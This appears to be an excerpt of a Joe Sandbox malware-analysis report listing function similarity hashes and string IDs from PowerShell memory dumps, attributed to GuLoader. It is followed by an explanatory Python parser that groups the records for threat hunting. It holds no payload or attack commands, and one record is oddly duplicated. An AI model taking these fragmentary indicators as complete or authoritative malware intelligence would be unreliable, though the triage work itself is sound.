                                                                      • Opcode Fuzzy Hash: 8d0bd662ec49784c2f8e9ecaf9fe8e18d85ec5ce92f0bfce9371a54756d1ee7a
                                                                      • Instruction Fuzzy Hash: 7D112630A042499FD705DBA8E8057AEBFB1EF86319F1046A9D5499B392DB315C41CBD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588239853.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_479d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                      • Instruction ID: 01d88b6a925be75a9fb3e0af34d9f868857e3890b422227c6cd283b08cf5fda7
                                                                      • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                      • Instruction Fuzzy Hash: EF219D76504240DFCF06CF10D9C4B16BFB2FB48314F24C5A9D9494A656C33AD86ACBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7458bba9ed0834dddf61d4e92807258e0c20afa21ce36c71e990a273e002c5f6
                                                                      • Instruction ID: 3d016e814518d11f868b3ae972555ff2662de9f4bfb797dec09b3abd51c3bc82
                                                                      • Opcode Fuzzy Hash: 7458bba9ed0834dddf61d4e92807258e0c20afa21ce36c71e990a273e002c5f6
                                                                      • Instruction ID: b96b80c23532bcb5a864558e1a1b7c2b7118f6c5d29f7775cbf486ed6c997ddc
                                                                      • Opcode Fuzzy Hash: 1bc985f791a63a4a43a4a8a2017aa91ab5bdda6b2d8718e74cd2903bf09dea74
                                                                      • Instruction Fuzzy Hash: A64147B1B14305DFCB24DE299C206BA7BA2DFC9794F04486ED905DB291DB32C946C7E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                      • API String ID: 0-2353078639
                                                                      • Opcode ID: a19125f27a5631702fb0ca93bcd37ed4ee952e48da6a510adff0185daa65c3d6
                                                                      • Instruction ID: b646abfef8461de4ce8b61af561a18a4a5a3c52e08c5a80de5b7bb94fb5061f8
                                                                      • Opcode Fuzzy Hash: a19125f27a5631702fb0ca93bcd37ed4ee952e48da6a510adff0185daa65c3d6
                                                                      • Instruction Fuzzy Hash: 344147B2300206DBCB29CE6C94A0576B7E5BFC93A1F648CAECD958B252DB30C901C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                      • API String ID: 0-1723543176
                                                                      • Opcode ID: ea62665f2516e4c70baedc7f6bf3707f35c4d0190a53fd31c872ab7bdd9c95af
                                                                      • Instruction ID: 44f6f04ea69b3730b5674931c84e56e5b81d7f01ce4c9889279b83ac7e5507c5
                                                                      • Opcode Fuzzy Hash: ea62665f2516e4c70baedc7f6bf3707f35c4d0190a53fd31c872ab7bdd9c95af
                                                                      • Instruction Fuzzy Hash: 9931AFB0B002159FCB24DF58C590A6EBBB2BB8D760F59895DE8056B350C771EC41CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o]q$(o]q$(o]q$(o]q
                                                                      • API String ID: 0-1261621458
                                                                      • Opcode ID: 9370c229b8ae63e67d6e1ba95d3f92a7d6b17293d24fe2a272bca6aa64087ed9
                                                                      • Instruction ID: f08e146d9660711e22f36056cc5c5c5eca9555d18e7881912e660afa477ea9e8
                                                                      • Opcode Fuzzy Hash: 9370c229b8ae63e67d6e1ba95d3f92a7d6b17293d24fe2a272bca6aa64087ed9
                                                                      • Instruction Fuzzy Hash: F2F158B1704345DFDB24CF68D8447AA7BA2FF89390F14886EE905CB291DBB1D845CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $]q$$]q$$]q$$]q
                                                                      • API String ID: 0-858218434
                                                                      • Opcode ID: 76d6af6d66f65936e9161f9c6d5dd7d7031c3ceb53e4b909583ffe35b95f5485
                                                                      • Instruction ID: 4dad79596eccf8f19405b44c33da5f214c8b21817af0bd70a04bb1c922954261
                                                                      • Opcode Fuzzy Hash: 76d6af6d66f65936e9161f9c6d5dd7d7031c3ceb53e4b909583ffe35b95f5485
                                                                      • Instruction Fuzzy Hash: 0C217CF13003069BDB74992A5940B37B7DA9BC9758F248C3E9B49D73C1CD36E8408B60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                      • API String ID: 0-978391646
                                                                      • Opcode ID: 86148e10d846892e9e386e0db51f2527dbd5f15270e4eff423a041b113974ac6
                                                                      • Instruction ID: 17d35171d10786d4d22c7237ffdd52a8fc689eac2877f98a40c99358149b6692
                                                                      • Opcode Fuzzy Hash: 86148e10d846892e9e386e0db51f2527dbd5f15270e4eff423a041b113974ac6
                                                                      • Instruction Fuzzy Hash: D501B16174D3C68FC72B576C6D201946FB25F8B69071A49EFC480CF2A7CA148C49C3A7
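The function records above are useful to a triager only once they are pulled out of the report layout: the Opcode ID and Instruction Fuzzy Hash are what you pivot on to find the same unpacked GuLoader code in other PowerShell memory dumps, and records that share an API String ID reference the same string set even when their code differs (two of the records above share 0-2353078639 with different Opcode IDs). The parser below is an added example and not Joe Sandbox code; it reads the record layout exactly as this report prints it (a record starts at a line reading "Strings", every bullet line is "Key: value") and the embedded sample text is three records copied verbatim from this section. The split of the Source File line into dump name, offset and based-on-PE flag follows the field order shown on the page; nothing else about the format is assumed.

```python
"""Parse Joe Sandbox 'Similarity' function records into structured rows.

Added example for this report, not Joe Sandbox code. It assumes only the
record layout visible in this section: a record begins at a line reading
'Strings', and each '• Key: value' bullet inside it is one field.
"""
import re
from collections import defaultdict

BULLET = "• "
SOURCE_RE = re.compile(
    r"(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)"
)

# Constructed sample: three records copied verbatim from this report section.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$$]q$$]q$$]q
• API String ID: 0-2353078639
• Opcode ID: 1bc985f791a63a4a43a4a8a2017aa91ab5bdda6b2d8718e74cd2903bf09dea74
• Instruction ID: b96b80c23532bcb5a864558e1a1b7c2b7118f6c5d29f7775cbf486ed6c997ddc
• Opcode Fuzzy Hash: 1bc985f791a63a4a43a4a8a2017aa91ab5bdda6b2d8718e74cd2903bf09dea74
• Instruction Fuzzy Hash: A64147B1B14305DFCB24DE299C206BA7BA2DFC9794F04486ED905DB291DB32C946C7E2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$$]q$$]q$$]q
• API String ID: 0-2353078639
• Opcode ID: a19125f27a5631702fb0ca93bcd37ed4ee952e48da6a510adff0185daa65c3d6
• Instruction ID: b646abfef8461de4ce8b61af561a18a4a5a3c52e08c5a80de5b7bb94fb5061f8
• Opcode Fuzzy Hash: a19125f27a5631702fb0ca93bcd37ed4ee952e48da6a510adff0185daa65c3d6
• Instruction Fuzzy Hash: 344147B2300206DBCB29CE6C94A0576B7E5BFC93A1F648CAECD958B252DB30C901C711
Strings
Memory Dump Source
• Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
Similarity
• API ID:
• String ID: (o]q$(o]q$(o]q$(o]q
• API String ID: 0-1261621458
• Opcode ID: 9370c229b8ae63e67d6e1ba95d3f92a7d6b17293d24fe2a272bca6aa64087ed9
• Instruction ID: f08e146d9660711e22f36056cc5c5c5eca9555d18e7881912e660afa477ea9e8
• Opcode Fuzzy Hash: 9370c229b8ae63e67d6e1ba95d3f92a7d6b17293d24fe2a272bca6aa64087ed9
• Instruction Fuzzy Hash: F2F158B1704345DFDB24CF68D8447AA7BA2FF89390F14886EE905CB291DBB1D845CBA1
"""


def parse_records(text):
    """Return one dict per record; keys are the bullet names as printed.

    The 'Source File' bullet is additionally split into source_file, offset
    (int) and based_on_pe (bool), which is what you need to locate the
    region in the dump. Header lines such as 'Memory Dump Source' carry
    no value and are skipped.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":
            current = {}
            records.append(current)
            continue
        if current is None or not line.startswith(BULLET):
            continue
        key, _, value = line[len(BULLET):].partition(":")
        key, value = key.strip(), value.strip()
        current[key] = value
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if m:
                current["source_file"] = m.group("file")
                current["offset"] = int(m.group("offset"), 16)
                current["based_on_pe"] = m.group("pe").lower() == "true"
    return records


def group_by_api_string_id(records):
    """Map each API String ID to the Opcode IDs of functions carrying it."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("API String ID", "")].append(r.get("Opcode ID", ""))
    return dict(groups)


def opcode_id_matches_fuzzy_hash(record):
    """Every record in this report has Opcode ID == Opcode Fuzzy Hash; a
    record where they differ is worth a second look before pivoting on it."""
    return record.get("Opcode ID") == record.get("Opcode Fuzzy Hash")


def hunting_rows(records):
    """(Opcode ID, Instruction Fuzzy Hash) pairs, deduplicated, for pivoting
    into other dumps or a fuzzy-hash index."""
    return sorted({(r["Opcode ID"], r["Instruction Fuzzy Hash"]) for r in records})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api_sid, opcode_ids in group_by_api_string_id(recs).items():
        print(api_sid, len(opcode_ids), "function(s)")
    for row in hunting_rows(recs):
        print(*row)
```

Run it against a saved copy of the report section instead of `SAMPLE` to get the full pivot list; the grouping step is where shared string references across otherwise different functions become visible.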